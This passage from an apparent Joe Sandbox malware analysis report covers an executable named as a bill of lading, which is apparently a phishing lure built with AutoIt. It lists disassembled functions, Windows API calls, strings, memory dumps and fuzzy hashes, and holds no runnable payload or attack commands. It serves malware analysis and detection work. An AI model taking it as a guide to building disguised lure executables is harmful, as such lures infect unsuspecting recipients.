                                                                                                                      • _wcscat.LIBCMT ref: 00436C2A
                                                                                                                      • _wcscat.LIBCMT ref: 00436C31
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                                                      • _wcsncpy.LIBCMT ref: 00436C62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                      • API String ID: 1503153545-1459072770
                                                                                                                      • Opcode ID: 4bf5914395717010b0ea9e2d69638f6034391d2624482ee6cf2f9dbb9f61e865
                                                                                                                      • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                      • Opcode Fuzzy Hash: 4bf5914395717010b0ea9e2d69638f6034391d2624482ee6cf2f9dbb9f61e865
                                                                                                                      • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                      Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                                                      • _fseek.LIBCMT ref: 004527FC
                                                                                                                      • __wsplitpath.LIBCMT ref: 0045285C
                                                                                                                      • _wcscpy.LIBCMT ref: 00452871
                                                                                                                      • _wcscat.LIBCMT ref: 00452886
                                                                                                                      • __wsplitpath.LIBCMT ref: 004528B0
                                                                                                                      • _wcscat.LIBCMT ref: 004528C8
                                                                                                                      • _wcscat.LIBCMT ref: 004528DD
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452914
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452925
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452944
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452955
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452976
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452987
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452998
                                                                                                                      • __fread_nolock.LIBCMT ref: 004529A9
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                        • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                        • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452A39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2054058615-0
                                                                                                                      • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                      • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                      • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                      • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                                      Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 0-4108050209
                                                                                                                      • Opcode ID: 832d7dfe82571d46151d64c4ba74b7ae12496bc5cddea04242c0c379dd164914
                                                                                                                      • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                                      • Opcode Fuzzy Hash: 832d7dfe82571d46151d64c4ba74b7ae12496bc5cddea04242c0c379dd164914
                                                                                                                      • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                                                      Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                                      • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                      • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                      • API String ID: 867697134-248962490
                                                                                                                      • Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                                      • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                                      • Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                                      • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                                                      Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2353593579-4108050209
                                                                                                                      • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                      • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                      • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                      • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                      Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32 ref: 0044A11D
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                      • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                      • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                      • GetWindowDC.USER32 ref: 0044A277
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                      • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1744303182-0
                                                                                                                      • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                      • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                      • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                      • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                      Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll$__wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                      • API String ID: 790654849-1810252412
                                                                                                                      • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                      • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                                                      • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                      • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                                                      Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1927566239-0
                                                                                                                      • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                      • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                      • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                      • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                      Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                      • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                      • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                      • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                      • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                      • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                        • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                      • API String ID: 1322021666-1919597938
                                                                                                                      • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                      • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                      • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                      • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                      Function 0045DE12 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                                                                      • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                                                                      • __wsplitpath.LIBCMT ref: 0045DF54
                                                                                                                      • _wcscat.LIBCMT ref: 0045DF6C
                                                                                                                      • _wcscat.LIBCMT ref: 0045DF7E
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                                                                      • _wcscpy.LIBCMT ref: 0045E019
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 3201719729-438819550
                                                                                                                      • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                      • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                                                                      • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                      • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                                                                      Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll$IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2485277191-404129466
                                                                                                                      • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                      • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                      • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                      • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                      Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                      • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                      • strncnt.LIBCMT ref: 00428646
                                                                                                                      • strncnt.LIBCMT ref: 0042865A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: strncnt$CompareErrorLastString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1776594460-0
                                                                                                                      • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                      • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                      • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                      • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                      Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                      • GetDesktopWindow.USER32 ref: 00454708
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0045470F
